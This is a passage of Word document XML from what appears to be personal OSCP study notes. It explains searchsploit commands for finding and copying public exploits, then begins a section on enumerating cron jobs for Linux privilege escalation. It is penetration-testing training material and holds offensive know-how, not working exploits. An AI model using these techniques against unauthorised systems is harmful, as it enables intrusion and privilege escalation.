        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A42">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="812800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="508" name="image489.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image489.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId88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2A43">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1115"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The exploit id's are those numbers inside of the "Path"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A44">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A45">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Update Searchsploit Database</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="632"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">searchsploit -u</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A47">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A48">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to use:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A49">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1167"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">searchsploit [service and version]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A4A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A4B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to look into a specific one script (Show Detailed Exploit Information):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A4C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1341"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">searchsploit -x [exploit id]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1341"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This tells you requirements and more info about scrip</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A4E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1341"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PRESS "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">q</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" to get out of the view</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A4F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A50">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Copy an Exploit to Your (current working) Directory:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A51">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="710"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">searchsploit -m [exploit id]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="710"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Or you can specify the path to the exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A53">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="710"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4814888" cy="3186777"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="119" name="image111.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image111.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId883"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4814888" cy="3186777"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A54">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A55">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exclude Certain Terms</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A56">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1309"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">searchsploit apache --exclude php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A57">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A58">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Export Results to a File:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A59">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1025"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">searchsploit Apache &gt; apache_exploits.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A5A">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A5B">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use Exact Keyword</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A5C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1080"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">searchsploit "Apache 2.4.29"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A5D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A5E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Get Structured JSON Output:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A5F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="271"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">searchsploit --json [keyword]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A60">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A61">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Open in the web:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A62">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="573"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">searchsploit -w [keyword]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A63">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A64">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tip:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Once you find a CVE, start searching with that exact CVE since it will give you more exact results</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A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66">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_d6h2l1g7q2m6" w:id="372"/>
      <w:bookmarkEnd w:id="372"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Scheduled Tasks (Cron) Enumeration</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A67">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_9q3y40n9ph3v" w:id="373"/>
      <w:bookmarkEnd w:id="373"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Checking installed cron jobs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A68">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A69">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From OSCP (18.1.2. Manual Enumeration) (Module 18 Linux Privilege Escalation)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A6A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A6B">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Next, let's examine scheduled tasks that attackers commonly leverage during privilege escalation attacks. Systems acting as servers often periodically execute various automated, scheduled tasks. When these systems are misconfigured, or the user-created files are left with insecure permissions, we can modify these files that will be executed by the scheduling system at a high privilege level.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A6C">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The Linux-based job scheduler is known as</w:t>
      </w:r>
      <w:hyperlink r:id="rId884">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId885">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">cron</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Scheduled tasks are listed under the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/cron.*</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> directories, where </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">*</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> represents the frequency at which the task will run. For example, tasks that will be run daily can be found under </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/cron.daily</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Each script is listed in its own subdirectory.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A6D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A6E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3627900" cy="4086467"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="370" name="image374.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image374.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId886"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3627900" cy="4086467"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A6F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="188"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ls -lah /etc/cron*</w:t>
      </w:r>
    </w:p>
